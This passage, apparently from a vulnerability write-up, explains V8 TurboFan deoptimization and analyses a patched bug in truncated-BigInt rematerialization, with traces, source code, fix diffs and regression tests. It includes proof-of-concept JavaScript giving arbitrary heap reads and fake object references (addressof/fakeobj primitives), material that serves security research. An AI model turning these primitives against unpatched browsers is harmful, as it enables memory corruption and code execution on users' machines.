LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}

// ...

4                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
REGISTER {input=rcx}
STACK_SLOT {input=4}
CAPTURED_OBJECT {length=7}
LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=6 (42)}


And we also see the code used to bail out to deoptimization (notice that the deopt index matches with the index of a translation in the deoptimization input data).

// trimmed / simplified output
nop
REX.W movq r13,0x0       ;; debug: deopt position, script offset '17'
;; debug: deopt position, inlining id '-1'
;; debug: deopt reason '(unknown)'
;; debug: deopt index 0
call 0x55807c02040       ;; lazy deoptimization bailout
// ...
REX.W movq r13,0x4       ;; debug: deopt position, script offset '44'
;; debug: deopt position, inlining id '-1'
;; debug: deopt reason 'wrong name'
;; debug: deopt index 4
call 0x55807bc2040       ;; eager deoptimization bailout
nop


Interestingly (you'll also need to add the --code-comments flag), we can notice that a native TurboFan-compiled function starts with a check for any required lazy deoptimization!

                  -- Prologue: check for deoptimization --
0x1332e5442b44    24  488b59e0       REX.W movq rbx,[rcx-0x20]
0x1332e5442b48    28  f6430f01       testb [rbx+0xf],0x1
0x1332e5442b4c    2c  740d           jz 0x1332e5442b5b  <+0x3b>
-- Inlined Trampoline to CompileLazyDeoptimizedCode --
0x1332e5442b4e    2e  49ba6096371501000000 REX.W movq r10,0x115379660  (CompileLazyDeoptimizedCode)    ;; off heap target
0x1332e5442b58    38  41ffe2         jmp r10


Now let's trace the actual deoptimization with --trace-deopt. We can see the deoptimization reason: wrong name. Because the feedback indicates that we always add a property named "x", TurboFan speculates it will always be the case. Thus, executing optimized code with any different name violates this assumption and triggers a deoptimization.

[deoptimizing (DEOPT eager): begin 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> (opt #0) @2, FP to SP delta: 24, caller sp: 0x7ffeeb82e3b0]
;;; deoptimize at <test.js:3:8>, wrong name


It displays the input frame.

  reading input frame add_prop => bytecode_offset=6, args=2, height=1, retval=0(#0); inputs:
0: 0x0a6842edfa99 ;  [fp -  16]  0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)>
1: 0x0a6876381579 ;  [fp +  24]  0x0a6876381579 <JSGlobal Object>
2: 0x0a6842edf7a9 ; rdx 0x0a6842edf7a9 <String[#9]: different>
3: 0x0a6842ec1831 ;  [fp -  24]  0x0a6842ec1831 <NativeContext[244]>
4: captured object #0 (length = 7)
0x0a68d4640439 ; (literal  3) 0x0a68d4640439 <Map(HOLEY_ELEMENTS)>
0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
5: 0x002a00000000 ; (literal  6) 42


The deoptimizer uses the translation at index 2 of the deoptimization input data.

     2                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
REGISTER {input=rdx}
STACK_SLOT {input=4}
CAPTURED_OBJECT {length=7}
LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=6 (42)}


And displays the translated interpreted frame.

  translating interpreted frame add_prop => bytecode_offset=6, variable_frame_size=16, frame_size=80
0x7ffeeb82e3a8: [top +  72] <- 0x0a6876381579 <JSGlobal Object> ;  stack parameter (input #1)
0x7ffeeb82e3a0: [top +  64] <- 0x0a6842edf7a9 <String[#9]: different> ;  stack parameter (input #2)
-------------------------
0x7ffeeb82e398: [top +  56] <- 0x000105d9e4d2 ;  caller's pc
0x7ffeeb82e390: [top +  48] <- 0x7ffeeb82e3f0 ;  caller's fp
0x7ffeeb82e388: [top +  40] <- 0x0a6842ec1831 <NativeContext[244]> ;  context (input #3)
0x7ffeeb82e380: [top +  32] <- 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> ;  function (input #0)
0x7ffeeb82e378: [top +  24] <- 0x0a6842edfbd1 <BytecodeArray[12]> ;  bytecode array
0x7ffeeb82e370: [top +  16] <- 0x003b00000000 <Smi 59> ;  bytecode offset
-------------------------
0x7ffeeb82e368: [top +   8] <- 0x0a6893080c11 <Odd Oddball: arguments_marker> ;  stack parameter (input #4)
0x7ffeeb82e360: [top +   0] <- 0x002a00000000 <Smi 42> ;  accumulator (input #5)


After that, it is ready to redirect the execution to the ignition interpreter.

[deoptimizing (eager): end 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> @2 => node=6, pc=0x000105d9e9a0, caller sp=0x7ffeeb82e3b0, took 2.698 ms]
Materialization [0x7ffeeb82e368] <- 0x0a6842ee0031 ;  0x0a6842ee0031 <Object map = 0xa68d4640439>


## Case study: an incorrect BigInt rematerialization

### Back to simplified lowering

Let's have a look at the way FrameState nodes are dealt with during the simplified lowering phase.

FrameState nodes expect 6 inputs:

1. parameters
• UseInfo is AnyTagged
2. registers
• UseInfo is AnyTagged
3. the accumulator
• UseInfo is Any
4. a context
• UseInfo is AnyTagged
5. a closure
• UseInfo is AnyTagged
6. the outer frame state
• UseInfo is AnyTagged

A FrameState has a tagged output representation.

void VisitFrameState(Node* node) {
  DCHECK_EQ(5, node->op()->ValueInputCount());
  DCHECK_EQ(1, OperatorProperties::GetFrameStateInputCount(node->op()));

  ProcessInput(node, 0, UseInfo::AnyTagged());  // Parameters.
  ProcessInput(node, 1, UseInfo::AnyTagged());  // Registers.

  // Accumulator is a special flower - we need to remember its type in
  // a singleton typed-state-values node (as if it was a singleton
  // state-values node).
  if (propagate()) {
    EnqueueInput(node, 2, UseInfo::Any());
  } else if (lower()) {
    Zone* zone = jsgraph_->zone();
    Node* accumulator = node->InputAt(2);
    if (accumulator == jsgraph_->OptimizedOutConstant()) {
      node->ReplaceInput(2, jsgraph_->SingleDeadTypedStateValues());
    } else {
      ZoneVector<MachineType>* types =
          new (zone->New(sizeof(ZoneVector<MachineType>)))
              ZoneVector<MachineType>(1, zone);
      (*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
                                       TypeOf(accumulator));

      node->ReplaceInput(
          2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                            types, SparseInputMask::Dense()),
                                        accumulator));
    }
  }

  ProcessInput(node, 3, UseInfo::AnyTagged());  // Context.
  ProcessInput(node, 4, UseInfo::AnyTagged());  // Closure.
  ProcessInput(node, 5, UseInfo::AnyTagged());  // Outer frame state.
  return SetOutput(node, MachineRepresentation::kTagged);
}


An input node for which the use info is AnyTagged means this input is used as a tagged value, and that the truncation kind is any, i.e. no truncation is required (although it may be required to distinguish between zeros).

An input node for which the use info is Any means the input is used as any kind of value, the truncation kind is any, and the input representation is undetermined. That is the most generic case.

// The {UseInfo} class is used to describe a use of an input of a node.

static UseInfo AnyTagged() {
  return UseInfo(MachineRepresentation::kTagged, Truncation::Any());
}
// Undetermined representation.
static UseInfo Any() {
  return UseInfo(MachineRepresentation::kNone, Truncation::Any());
}
// Value not used.
static UseInfo None() {
  return UseInfo(MachineRepresentation::kNone, Truncation::None());
}

const char* Truncation::description() const {
  switch (kind()) {
    case TruncationKind::kNone:
      return "no-value-use";
    // ...
    case TruncationKind::kAny:
      switch (identify_zeros()) {
        case kIdentifyZeros:
          return "no-truncation (but identify zeros)";
        case kDistinguishZeros:
          return "no-truncation (but distinguish zeros)";
      }
  }
  // ...
}


If we trace the first phase of simplified lowering (truncation propagation), we get the following output:

 visit #46: FrameState (trunc: no-truncation (but distinguish zeros))
queue #7?: no-truncation (but distinguish zeros)
initial #45: no-truncation (but distinguish zeros)
queue #71?: no-truncation (but distinguish zeros)
queue #4?: no-truncation (but distinguish zeros)
queue #62?: no-truncation (but distinguish zeros)
queue #0?: no-truncation (but distinguish zeros)


All the inputs are added to the queue, no truncation is ever propagated. The node #71 corresponds to the accumulator since it is the 3rd input.

 visit #71: BigIntAsUintN (trunc: no-truncation (but distinguish zeros))
queue #70?: no-value-use


In our example, the accumulator input is a BigIntAsUintN node. Such a node consumes an input which is a word64 and is truncated to a word64.

The astute reader will wonder what happens if this node returns a number that requires more than 64 bits. The answer lies in the inlining phase: a JSCall to the BigInt.asUintN builtin is reduced to a BigIntAsUintN turbofan operator only when TurboFan is guaranteed that the requested width is 64 bits at most.
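That 64-bit guarantee can be checked from plain JavaScript: BigInt.asUintN(64, x) reduces x modulo 2**64, so its result always fits in an unsigned 64-bit word.

```javascript
// BigInt.asUintN(width, x) computes x mod 2**width as an unsigned
// value, so with width 64 the result is always representable as a
// machine word64.
console.log(BigInt.asUintN(64, 2n ** 64n + 5n)); // 5n
console.log(BigInt.asUintN(64, -1n));            // 18446744073709551615n (2**64 - 1)
```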

This node outputs a word64 and has BigInt as a restriction type. During the type propagation phase, any type computed for a given node will be intersected with its restriction type.

      case IrOpcode::kBigIntAsUintN: {
        ProcessInput(node, 0, UseInfo::TruncatingWord64());
        SetOutput(node, MachineRepresentation::kWord64, Type::BigInt());
        return;
      }


So at this point (after the propagation phase and before the lowering phase), if we focus on the FrameState node and its accumulator input (input 2, i.e. the 3rd input), we can say the following:

• the FrameState's accumulator input expects MachineRepresentation::kNone (which includes everything, in particular kWord64)
• the FrameState doesn't truncate its accumulator input
• the BigIntAsUintN output representation is kWord64

Because input 2 is used as Any (with a kNone representation), no conversion of the input node will ever be inserted:

  // Converts input {index} of {node} according to given UseInfo {use},
  // assuming the type of the input is {input_type}. If {input_type} is null,
  // it takes the input from the input node {TypeOf(node->InputAt(index))}.
  void ConvertInput(Node* node, int index, UseInfo use,
                    Type input_type = Type::Invalid()) {
    Node* input = node->InputAt(index);
    // In the change phase, insert a change before the use if necessary.
    if (use.representation() == MachineRepresentation::kNone)
      return;  // No input requirement on the use.


So what happens during the last phase of simplified lowering (the phase that lowers nodes and adds conversions)? If we look at the visitor of FrameState nodes, we can see that eventually the accumulator input may get replaced by a TypedStateValues node. The BigIntAsUintN node then becomes an input of the TypedStateValues node. No conversion of any kind is ever done.

  ZoneVector<MachineType>* types =
      new (zone->New(sizeof(ZoneVector<MachineType>)))
          ZoneVector<MachineType>(1, zone);
  (*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
                                   TypeOf(accumulator));

  node->ReplaceInput(
      2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                        types, SparseInputMask::Dense()),
                                    accumulator));


Also, the vector of MachineTypes is associated with the TypedStateValues node. To compute the machine type, DeoptMachineTypeOf relies on the node's type.

In that case (a BigIntAsUintN node), the type will be Type::BigInt().

Type OperationTyper::BigIntAsUintN(Type type) {
DCHECK(type.Is(Type::BigInt()));
return Type::BigInt();
}


As we just saw, because this node's output representation is kWord64 and its type is BigInt, the MachineType is MachineType::AnyTagged.

  static MachineType DeoptMachineTypeOf(MachineRepresentation rep, Type type) {
    // ...
    if (rep == MachineRepresentation::kWord64) {
      if (type.Is(Type::BigInt())) {
        return MachineType::AnyTagged();
      }
      // ...
    }


So if we look at the sea of nodes right after the escape analysis phase and before the simplified lowering phase, it looks like this:

And after the simplified lowering phase, we can confirm that a TypedStateValues node was indeed inserted.

After effect control linearization, the BigIntAsUintN node gets lowered to a Word64And node.

As we learned earlier, the FrameState and TypedStateValues nodes do not directly correspond to any code generation.

void InstructionSelector::VisitNode(Node* node) {
  switch (node->opcode()) {
    // ...
    case IrOpcode::kFrameState:
    case IrOpcode::kStateValues:
    case IrOpcode::kObjectState:
      return;
    // ...


However, other nodes may make use of FrameState and TypedStateValues nodes. This is the case, for instance, of the various Deoptimize nodes as well as Call nodes.

They will make the instruction selector build the necessary FrameStateDescriptor and StateValueList of StateValueDescriptor.

Using those structures, the code generator will then build the necessary DeoptimizationExits, to which a Translation will be associated. The function BuildTranslation will handle the InstructionOperands in CodeGenerator::AddTranslationForOperand. And this is where the (AnyTagged) MachineType corresponding to the BigIntAsUintN node is used! When building the translation, we are using the BigInt value as if it were a pointer (second branch) and not a double value (first branch)!

void CodeGenerator::AddTranslationForOperand(Translation* translation,
                                             Instruction* instr,
                                             InstructionOperand* op,
                                             MachineType type) {
  // ...
  case Constant::kInt64:
    DCHECK_EQ(8, kSystemPointerSize);
    if (type.representation() == MachineRepresentation::kWord64) {
      literal =
          DeoptimizationLiteral(static_cast<double>(constant.ToInt64()));
    } else {
      // When pointers are 8 bytes, we can use int64 constants to represent
      // Smis.
      DCHECK_EQ(MachineRepresentation::kTagged, type.representation());
      Smi smi(static_cast<Address>(constant.ToInt64()));
      DCHECK(smi.IsSmi());
      literal = DeoptimizationLiteral(smi.value());
    }
    break;


This is very interesting because it means that at runtime (when deoptimizing), the deoptimizer uses this pointer to rematerialize an object! But since this is a controlled value (the truncated BigInt), we can make the deoptimizer reference an arbitrary object, and thus make the next Ignition bytecode handler use (or not) this crafted reference.

In this case, we are playing with the accumulator register. Therefore, to find interesting primitives, what we need to do is to look for all the bytecode handlers that get the accumulator (using a GetAccumulator for instance).

### Experiment 1 - reading an arbitrary heap number

The most obvious primitive is the one we get by deoptimizing to the ignition handler for add opcodes.

let addr = BigInt(0x11111111);

function f(x) {
let y = BigInt.asUintN(64, addr); // truncated BigInt; this call produces the BigIntAsUintN node
let a = 111;
try {
var res = 1.1 + y; // will trigger a deoptimization. reason : "Insufficient type feedback for binary operation"
return res;
}
catch(_){ return y}
}

function compileOnce() {
f({x:1.1});
%PrepareFunctionForOptimization(f);
f({x:1.1});
%OptimizeFunctionOnNextCall(f);
return f({x:1.1});
}


When reading the implementation of the handler (BinaryOpAssembler::Generate_AddWithFeedback in src/ic/binary-op-assembler.cc), we observe that for heap number additions, the code ends up calling the function LoadHeapNumberValue. In this case, it gets called with an arbitrary pointer.

To demonstrate the bug, we use the %DebugPrint runtime function to get the address of an object (simulate an infoleak primitive) and see that we indeed (incorrectly) read its value.

d8> var a = new Number(3.14); %DebugPrint(a)
0x025f585caa49 <Number map = 000000FB210820A1 value = 0x019d1cb1f631 <HeapNumber 3.14>>
3.14
undefined
d8> compileOnce()
4.24


We can get the same primitive using other kinds of Ignition bytecode handlers, such as those for +, -, /, * or %.

--- var res = 1.1 + y;
+++ var res = y / 1;

d8> var a = new Number(3.14); %DebugPrint(a)
0x019ca5a8aa11 <Number map = 00000138F15420A1 value = 0x0168e8ddf611 <HeapNumber 3.14>>
3.14
undefined
d8> compileOnce()
3.14


The --trace-ignition debugging utility is useful in this scenario. For instance, let's say we use a BigInt value of 0x4200000000 and, instead of doing 1.1 + y, we do y / 1. We can then trace the execution and confirm the behaviour that we expect.

The trace tells us:

• a deoptimization was triggered, and why (insufficient type feedback for binary operation, the binary operation being the division)
• in the input frame, there is a register entry containing the BigInt value thanks to (or because of) the incorrect lowering: 11: 0x004200000000 ; rcx 66
• in the translated interpreted frame, the accumulator gets the value 0x004200000000 (<Smi 66>)
• we deoptimize directly to offset 39, which corresponds to DivSmi [1], [6]
[deoptimizing (DEOPT soft): begin 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> (opt #0) @3, FP to SP delta: 40, caller sp: 0x0042f87fde08]
;;; deoptimize at <read_heap_number.js:11:17>, Insufficient type feedback for binary operation
reading input frame f => bytecode_offset=39, args=2, height=8, retval=0(#0); inputs:
0: 0x01b141c5f5f1 ;  [fp -  16]  0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)>
1: 0x03a35e2c1349 ;  [fp +  24]  0x03a35e2c1349 <JSGlobal Object>
2: 0x03a35e2cb3b1 ;  [fp +  16]  0x03a35e2cb3b1 <Object map = 0000019FAF409DF1>
3: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
4: 0x03a35e2cb3d1 ; rdi 0x03a35e2cb3d1 <BigInt 283467841536>
5: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
6: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
7: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
8: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
9: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
10: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
11: 0x004200000000 ; rcx 66
translating interpreted frame f => bytecode_offset=39, height=64
0x0042f87fde00: [top + 120] <- 0x03a35e2c1349 <JSGlobal Object> ;  stack parameter (input #1)
0x0042f87fddf8: [top + 112] <- 0x03a35e2cb3b1 <Object map = 0000019FAF409DF1> ;  stack parameter (input #2)
-------------------------
0x0042f87fddf0: [top + 104] <- 0x7ffd93f64c1d ;  caller's pc
0x0042f87fdde8: [top +  96] <- 0x0042f87fde38 ;  caller's fp
0x0042f87fdde0: [top +  88] <- 0x01b141c5f551 <ScriptContext[5]> ;  context (input #3)
0x0042f87fddd8: [top +  80] <- 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> ;  function (input #0)
0x0042f87fddd0: [top +  72] <- 0x01b141c5fa41 <BytecodeArray[61]> ;  bytecode array
0x0042f87fddc8: [top +  64] <- 0x005c00000000 <Smi 92> ;  bytecode offset
-------------------------
0x0042f87fddc0: [top +  56] <- 0x03a35e2cb3d1 <BigInt 283467841536> ;  stack parameter (input #4)
0x0042f87fddb8: [top +  48] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #5)
0x0042f87fddb0: [top +  40] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #6)
0x0042f87fdda8: [top +  32] <- 0x01b141c5f551 <ScriptContext[5]> ;  stack parameter (input #7)
0x0042f87fdda0: [top +  24] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #8)
0x0042f87fdd98: [top +  16] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #9)
0x0042f87fdd90: [top +   8] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #10)
0x0042f87fdd88: [top +   0] <- 0x004200000000 <Smi 66> ;  accumulator (input #11)
[deoptimizing (soft): end 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> @3 => node=39, pc=0x7ffd93f65100, caller sp=0x0042f87fde08, took 2.328 ms]
-> 000001B141C5FA9D @   39 : 43 01 06          DivSmi [1], [6]
[ accumulator -> 66 ]
[ accumulator <- 66 ]
-> 000001B141C5FAA0 @   42 : 26 f9             Star r2
[ accumulator -> 66 ]
[          r2 <- 66 ]
-> 000001B141C5FAA2 @   44 : a9                Return
[ accumulator -> 66 ]


### Experiment 2 - getting an arbitrary object reference

This bug also gives a better, more powerful primitive. Indeed, if instead of deoptimizing back to an add handler we deoptimize to Builtins_StaKeyedPropertyHandler, we'll be able to store an arbitrary object reference in an object property. Therefore, an attacker who is also able to leverage an infoleak primitive would be able to craft arbitrary objects (these are sometimes referred to as the addressof and fakeobj primitives).

In order to deoptimize to this specific handler, aka deoptimize on obj[x] = y, we have to make this line do something that violates a speculation. If we repeatedly call the function f with the same property name, TurboFan will speculate that we're always gonna add the same property. Once the code is optimized, using a property with a different name will violate this assumption, call the deoptimizer and then redirect execution to the StaKeyedProperty handler.

let addr = BigInt(0x11111111);

function f(x) {
let y = BigInt.asUintN(64, addr); // as before, this call produces the BigIntAsUintN node
let a = 111;
try {
var obj = {};
obj[x] = y;
return obj;
}
catch(_){ return y}
}

function compileOnce() {
f("foo");
%PrepareFunctionForOptimization(f);
f("foo");
f("foo");
f("foo");
f("foo");
%OptimizeFunctionOnNextCall(f);
f("foo");
return f("boom"); // deopt reason : wrong name
}


To experiment, we simulate the infoleak primitive using the %DebugPrint runtime function, and add an ArrayBuffer to the object. That should not be possible, since the JavaScript code is actually adding a truncated BigInt.

d8> var a = new ArrayBuffer(8); %DebugPrint(a);
0x003d5ef8ab79 <ArrayBuffer map = 00000354B09C2191>
[object ArrayBuffer]
undefined
undefined
0x003d5ef8d159 <Object map = 00000354B09C9F81>
{boom: [object ArrayBuffer]}
[object ArrayBuffer]


Et voila! Sweet as!

### Variants

We saw with the first commit that the pattern affected FrameState nodes but also StateValues nodes.

Another commit further fixed the exact same bug affecting ObjectState nodes.

From 3ce6be027562ff6641977d7c9caa530c74a279ac Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Tue, 26 Nov 2019 13:17:45 +0100
Subject: [PATCH] [turbofan] Fixes crash caused by truncated bigint

Bug: chromium:1028191
Change-Id: Idfcd678b3826fb6238d10f1e4195b02be35c3010
Commit-Queue: Nico Hartmann <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
---

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 4c000af..f271469 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1254,7 +1254,13 @@
void VisitObjectState(Node* node) {
if (propagate()) {
for (int i = 0; i < node->InputCount(); i++) {
-        EnqueueInput(node, i, UseInfo::Any());
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          EnqueueInput(node, i, UseInfo::AnyTagged());
+        } else {
+          EnqueueInput(node, i, UseInfo::Any());
+        }
}
} else if (lower()) {
Zone* zone = jsgraph_->zone();
@@ -1265,6 +1271,11 @@
Node* input = node->InputAt(i);
(*types)[i] =
DeoptMachineTypeOf(GetInfo(input)->representation(), TypeOf(input));
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          ConvertInput(node, i, UseInfo::AnyTagged());
+        }
}
NodeProperties::ChangeOp(node, jsgraph_->common()->TypedObjectState(
ObjectIdOf(node->op()), types));
diff --git a/test/mjsunit/regress/regress-1028191.js b/test/mjsunit/regress/regress-1028191.js
new file mode 100644
index 0000000..543028a
--- /dev/null
+++ b/test/mjsunit/regress/regress-1028191.js
@@ -0,0 +1,23 @@
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax
+
+"use strict";
+
+function f(a, b, c) {
+  let x = BigInt.asUintN(64, a + b);
+  try {
+    x + c;
+  } catch(_) {
+    eval();
+  }
+  return x;
+}
+
+%PrepareFunctionForOptimization(f);
+assertEquals(f(3n, 5n), 8n);
+assertEquals(f(8n, 12n), 20n);
+%OptimizeFunctionOnNextCall(f);
+assertEquals(f(2n, 3n), 5n);


Interestingly, other bugs in the representation changer got triggered by very similar PoCs. The fix simply adds a call to InsertConversion so as to insert a ChangeUint64ToBigInt node when necessary.

From 8aa588976a1c4e593f0074332f5b1f7020656350 Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Thu, 12 Dec 2019 10:06:19 +0100
Subject: [PATCH] [turbofan] Fixes rematerialization of truncated BigInts

Bug: chromium:1029530
Change-Id: I12aa4c238387f6a47bf149fd1a136ea83c385f4b
Auto-Submit: Nico Hartmann <[email protected]>
Commit-Queue: Georg Neis <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
---

diff --git a/src/compiler/representation-change.cc b/src/compiler/representation-change.cc
index 99b3d64..9478e15 100644
--- a/src/compiler/representation-change.cc
+++ b/src/compiler/representation-change.cc
@@ -175,6 +175,15 @@
}
}

+  // Rematerialize any truncated BigInt if user is not expecting a BigInt.
+  if (output_type.Is(Type::BigInt()) &&
+      output_rep == MachineRepresentation::kWord64 &&
+      use_info.type_check() != TypeCheckKind::kBigInt) {
+    node =
+        InsertConversion(node, simplified()->ChangeUint64ToBigInt(), use_node);
+    output_rep = MachineRepresentation::kTaggedPointer;
+  }
+
switch (use_info.representation()) {
case MachineRepresentation::kTaggedSigned:
DCHECK(use_info.type_check() == TypeCheckKind::kNone ||
diff --git a/test/mjsunit/regress/regress-1029530.js b/test/mjsunit/regress/regress-1029530.js
new file mode 100644
index 0000000..918a9ec
--- /dev/null
+++ b/test/mjsunit/regress/regress-1029530.js
@@ -0,0 +1,40 @@
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax --interrupt-budget=1024
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,3n);
+    let i = 0;
+    while(i < 1) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}
+
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,10n);
+    let i = 0.1;
+    while(i < 1.8) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}


An inlining bug was also patched. Indeed, a call to BigInt.asUintN would get inlined even when no value argument is given (as in BigInt.asUintN(bits,no_value_argument_here)). Therefore a call to GetValueInput would be made on a non-existing input! The fix simply adds a check on the number of inputs.

Node* value = NodeProperties::GetValueInput(node, 3); // input 3 may not exist!


An interesting fact to point out is that none of those PoCs would actually execute correctly: they all trigger exceptions that need to be caught. This leads to interesting behaviours from TurboFan, which ends up optimizing 'invalid' code.

### Digression on pointer compression

In our small experiments, we used standard tagged pointers. To distinguish small integers (Smis) from heap objects, V8 uses the lowest bit of the tagged value.

Up until V8 8.0, it looks like this:

Smi:                   [32 bits] [31 bits (unused)]  |  0
Strong HeapObject:                        [pointer]  | 01
Weak HeapObject:                          [pointer]  | 11


However, V8 8.0 comes with pointer compression, which will ship with the upcoming M80 stable release. Starting from this version, Smis and compressed pointers are stored as 32-bit values:

Smi:                                      [31 bits]  |  0
Strong HeapObject:                        [30 bits]  | 01
Weak HeapObject:                          [30 bits]  | 11


As described in the design document, a compressed pointer corresponds to the first 32-bits of a pointer to which we add a base address when decompressing.
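The decompression itself is trivial addition. A small sketch of the computation (in JavaScript, using BigInts for the 64-bit arithmetic; the base and compressed values are the ones observed in the debugging session in this section):

```javascript
// A compressed pointer is the low 32 bits of the full address; adding the
// per-isolate base address (kept in r13 on x64) restores the full pointer.
const base = 0x16a400000000n;   // isolate root, as read from r13
const compressed = 0x080c5f71n; // compressed 'elements' pointer
const full = base + compressed;
console.log(full.toString(16)); // "16a4080c5f71"
```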

Let's quickly have a look by inspecting the memory ourselves. Note that DebugPrint displays uncompressed pointers.

d8> var a = new Array(1,2,3,4)
undefined
d8> %DebugPrint(a)
DebugPrint: 0x16a4080c5f61: [JSArray]
- map: 0x16a4082817e9 <Map(PACKED_SMI_ELEMENTS)> [FastProperties]
- prototype: 0x16a408248f25 <JSArray[0]>
- elements: 0x16a4080c5f71 <FixedArray[4]> [PACKED_SMI_ELEMENTS]
- length: 4
- properties: 0x16a4080406e1 <FixedArray[0]> {
#length: 0x16a4081c015d <AccessorInfo> (const accessor descriptor)
}
- elements: 0x16a4080c5f71 <FixedArray[4]> {
0: 1
1: 2
2: 3
3: 4
}


If we look in memory, we'll actually find compressed pointers, which are 32-bit values.

(lldb) x/10wx 0x16a4080c5f61-1
0x16a4080c5f60: 0x082817e9 0x080406e1 0x080c5f71 0x00000008
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008


To get the full address, we need to know the base.

(lldb) register read r13
r13 = 0x000016a400000000


And we can manually uncompress a pointer by computing base + compressed_pointer (and obviously we subtract 1 to untag the pointer).

(lldb) x/10wx r13+0x080c5f71-1
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008 0x08040549 0x39dc599e
0x16a4080c5f90: 0x00000adc 0x7566280a


Because on a 64-bit build Smis are now stored on 32 bits with the lsb set to 0, we need to shift their values by one. Raw pointers are also supported: an example of a raw pointer is the backing store pointer of an array buffer.

d8> var a = new ArrayBuffer(0x40);
d8> var v = new Uint32Array(a);
d8> v[0] = 0x41414141

d8> %DebugPrint(a)
DebugPrint: 0x16a4080c7899: [JSArrayBuffer]
- map: 0x16a408281181 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x16a4082476f5 <Object map = 0x16a4082811a9>
- elements: 0x16a4080406e1 <FixedArray[0]> [HOLEY_ELEMENTS]
- embedder fields: 2
